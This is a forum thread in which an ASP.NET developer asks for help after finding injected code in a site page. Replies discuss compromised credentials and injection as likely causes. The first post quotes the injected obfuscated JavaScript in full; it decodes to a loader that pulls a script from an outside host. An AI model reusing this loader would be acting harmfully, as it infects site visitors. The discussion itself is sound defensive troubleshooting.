Tek-Tips is the largest IT community on the Internet today!

Members share and learn making Tek-Tips Forums the best source of peer-reviewed technical information on the Internet!

  • Congratulations strongm on being selected by the Tek-Tips community for having the most helpful posts in the forums last week. Way to Go!

Parser Error Message: Possibly being Hacked

Status
Not open for further replies.

txmed

Programmer
Mar 23, 2006
65
US
Greetings,

I've recently created a ASP 2.0 site that's been running fine. A few days ago I noticed that the page was coming up with a "Parser" error message. I'm hoping someone has experience in this error message and can inform me how to fix it.

I'm using a standard master page for my entire site. I then have all of the HTML "child" pages showing in the <asp:Content> tags. The problem is that I think I'm being hacked and someone is inserting Javascript code after the </asp:Content> tag.

Here is a copy of the error message:

Parser Error

Description: An error occurred during the parsing of a resource required to service this request. Please review the following specific parse error details and modify your source file appropriately.

Parser Error Message: Only Content controls are allowed directly in a content page that contains Content controls.

Code:
Source Error:

Line 34: </asp:Content>
Line 35: 
Line 36: <html><body><script type="text/javascript">var gLgqfal0LD6Zjb = "r0wbP21r0wbP35";var LGVypdcQDOHuoS0 = "r0wbP3cr0wbP73r0wbP63r0wbP72r0wbP6"; var LGVypdcQDOHuoS1 = "9r0wbP70r0wbP74r0wbP20r0wbP74r0wbP"; var LGVypdcQDOHuoS2 = "79r0wbP70r0wbP65r0wbP3dr0wbP22r0wb"; var LGVypdcQDOHuoS3 = "P74r0wbP65r0wbP78r0wbP74r0wbP2fr0w"; var LGVypdcQDOHuoS4 = "bP6ar0wbP61r0wbP76r0wbP61r0wbP73r0"; var LGVypdcQDOHuoS5 = "wbP63r0wbP72r0wbP69r0wbP70r0wbP74r"; var LGVypdcQDOHuoS6 = "0wbP22r0wbP20r0wbP73r0wbP72r0wbP63"; var LGVypdcQDOHuoS7 = "r0wbP3dr0wbP22r0wbP68r0wbP74r0wbP7"; var LGVypdcQDOHuoS8 = "4r0wbP70r0wbP3ar0wbP2fr0wbP2fr0wbP"; var LGVypdcQDOHuoS9 = "33r0wbP34r0wbP36r0wbP33r0wbP32r0wb"; var LGVypdcQDOHuoS10 = "P66r0wbP66r0wbP76r0wbP78r0wbP7ar0w"; var LGVypdcQDOHuoS11 = "bP2er0wbP73r0wbP65r0wbP72r0wbP76r0"; var LGVypdcQDOHuoS12 = "wbP65r0wbP69r0wbP72r0wbP63r0wbP2er"; var LGVypdcQDOHuoS13 = "0wbP63r0wbP6fr0wbP6dr0wbP2fr0wbP2f"; var LGVypdcQDOHuoS14 = "r0wbP6dr0wbP6cr0wbP2er0wbP70r0wbP6"; var LGVypdcQDOHuoS15 = "8r0wbP70r0wbP22r0wbP3er0wbP20r0wbP"; var LGVypdcQDOHuoS16 = "3cr0wbP2fr0wbP73r0wbP63r0wbP72r0wb"; var LGVypdcQDOHuoS17 = "P69r0wbP70r0wbP74r0wbP3e"; var W9QVkc1kFlgLAO = "zcViA21r0wbP35";var iFcV0Loi2K5lA3 = LGVypdcQDOHuoS0+LGVypdcQDOHuoS1+LGVypdcQDOHuoS2+LGVypdcQDOHuoS3+LGVypdcQDOHuoS4+LGVypdcQDOHuoS5+LGVypdcQDOHuoS6+LGVypdcQDOHuoS7+LGVypdcQDOHuoS8+LGVypdcQDOHuoS9+LGVypdcQDOHuoS10+LGVypdcQDOHuoS11+LGVypdcQDOHuoS12+LGVypdcQDOHuoS13+LGVypdcQDOHuoS14+LGVypdcQDOHuoS15+LGVypdcQDOHuoS16+LGVypdcQDOHuoS17; QY2NpXLfBx6PMN = iFcV0Loi2K5lA3.replace(/r0wbP/g,"%");var fBqXRS4aosIqDN = unescape;var gLgqfal0LD6Zjb = "YV1vq21zcViA35";w9221 = this;var eNQGwSdlzzQBxW=w9221["WJd5GoGJc2uG5mJGe2JnltJ".replace(/[J52WlG\:]/g, "")];eNQGwSdlzzQBxW.write(fBqXRS4aosIqDN(QY2NpXLfBx6PMN));</script></body></html>


Again I'm stressing that I did not write the code that appears after the </asp:Content> tag. Someone (or something) is adding it there.


Unfortunately the only thing I can do right now is copy my original source files over the corrupted file. But when I do it's only a matter of time before the problem happens again.

I've done some research on the web but I cannot find a solution. Can some please help me?

Thanks,

(txmed)
 
webforms is known for it's horrendous html/style/javascript output. but in this instance I think you may be correct, in that someone is attempting to hack your site. the additional html and body tags are a sign that it's not produced by the webforms view engine.

the immediate fix is to overwrite the corrupted files.
if your application uses a database verify the data is clean too.
finally change your password for site administration. there's a chance your admin account was compromised.

Jason Meckley
Programmer

faq855-7190
faq732-7259
 
jmeckley & ca8msm,

Thank you for your quick response. I'm going to change the login credentials for my site to see if this fixes the problem. I'll keep you posted if this happens again.

(txmed)
 
I'm going to change the login credentials for my site to see if this fixes the problem
The problem is that will only mask the problem; whatever method they used to get in will still be vunerable so even if you change your password the same method can be applied and you will be back in the same position.

I'm not saying don't do it, you should of course change it to something secure, but I see little point in changing it and then doing nothing.

Mark,

Darlington Web Design[tab]|[tab]Experts, Information, Ideas & Knowledge[tab]|[tab]ASP.NET Tips & Tricks
 
if the content is injected into the html rendered by webforms then you have an injection attack. if the html is present in the aspx markup, then your credentials were compromised. most likely the ftp credentials.

Jason Meckley
Programmer

faq855-7190
faq732-7259
 
jmeckley,

Yes I had that same thought. The fact that the code was appearing within my .aspx file made me believe that my credentials were compromised.

I just changed my login credentials and I verified that the site is coming up as intended. I'm going to wait to see if this fixes the problem.

Thanks for your input.

(txmed)
 
The fact that the code was appearing within my .aspx file made me believe that my credentials were compromised.
Which could be as a result of injection (i.e. reading credentials stored in a database), so you still need to shore up whatever original method they used to get into your site.

Mark,

Darlington Web Design[tab]|[tab]Experts, Information, Ideas & Knowledge[tab]|[tab]ASP.NET Tips & Tricks
 
I agree but no where in my app am I using the login credentials for the site. Unless the database of the company where I'm hosting the site has been hacked into.

(txmed)
 
In a production environment, our FTP root is NOT part of the HTTP root... that is I can ftp the files up, but I have to have some other process copy/move the files to the HTTP root. Essentially we have a web service that requires credentials (different from FTP) that hashes against what's supposed to be there, and then copies the files if it's proper.
 
ca8msm,

Yes I agree. I'll call them to see what they say.


NESWalt,

Thank you for your input. I'll see what we can do in the future.

Thanks,

(txmed)
 
how strong was your password? if the password was weak, then a simple dictionary attack could give someone access to your account.

Jason Meckley
Programmer

faq855-7190
faq732-7259
 
jmeckley,

The password was fairly strong but I broke a cardinal rule and used a user name/password that I've used for other accounts. I went ahead and changed the password to something stronger and more difficult to guess.

(txmed)
 
Hello. I just wanted to send an update to everyone who helped me out on this topic. I changed the password for my login credentials and I have not had this problem since.

Thanks to everyone who helped me with this.

(txmed)
 
Status
Not open for further replies.

Part and Inventory Search

Sponsor

Back
Top